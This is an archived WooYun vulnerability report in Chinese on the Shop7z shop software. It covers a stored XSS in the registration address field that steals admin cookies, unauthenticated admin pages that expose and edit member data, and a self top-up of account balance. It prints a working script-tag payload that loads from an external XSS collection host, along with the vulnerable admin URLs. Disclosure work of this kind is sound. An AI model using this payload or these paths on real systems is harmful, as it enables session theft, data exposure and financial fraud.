当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071885

漏洞标题:Shop7z多个漏洞大礼包

相关厂商:Shop7z

漏洞作者: LinE

提交时间:2014-08-12 17:33

修复时间:2014-09-26 17:34

公开时间:2014-09-26 17:34

漏洞类型:应用配置错误

危害等级:低

自评Rank:1

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

前台存储型XSS打后台,后台限制不严导致敏感数据访问,自己给自己充值TAT,等等····

详细说明:

0x01 前台XSS,使用官方最新的免费版源代码
在注册用户的时候,地址当中输入XSS代码
"><script src=http://xsser.l1n3.net/WY6NN2?1407683427></script>
如图

1.png


然后注册,显示注册成功

2.png


这时候查看一下后台---会员信息管理--会员管理---该会员详细信息

3.png


可以看到xss代码已经插进去了
而xss平台也能收到cookies信息

4.png


0x02 未授权访问
http://127.0.0.1/admin/huiyuandetail.asp?id=831
该地址在免费版中未做权限检查,导致可以直接在这里遍历会员信息,同时可以修改任意会员信息
相关代码
huiyuandetail.asp中检查过了,无权限相关检查,包含的两个文件,一个conn中给了一个cookies
conn.asp

8 m_user=session("m_user")
9 m_gold=session("m_gold")


另一个check4.asp是空文件,无用
导致了未授权的访问,完全可以遍历用户信息

5.png


0x03
业务逻辑导致给自己充钱
依然是之前的未授权访问,访问
http://127.0.0.1/admin/Chongzhiadd.asp
然后选择会员,我选择自己

6.png


冲他个百八十万的,我也是土豪,嘎嘎,然后直接确定,
查看充值记录

7.png


10.png


好了,瞬间变土豪....
还有一些其他的漏洞,暂时还没测试出来,等下一波再发吧

漏洞证明:

5.png


3.png


4.png


10.png

修复方案:

一个商场代码写的如此不严谨,如何面对江东父老啊·····

版权声明:转载请注明来源 LinE@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝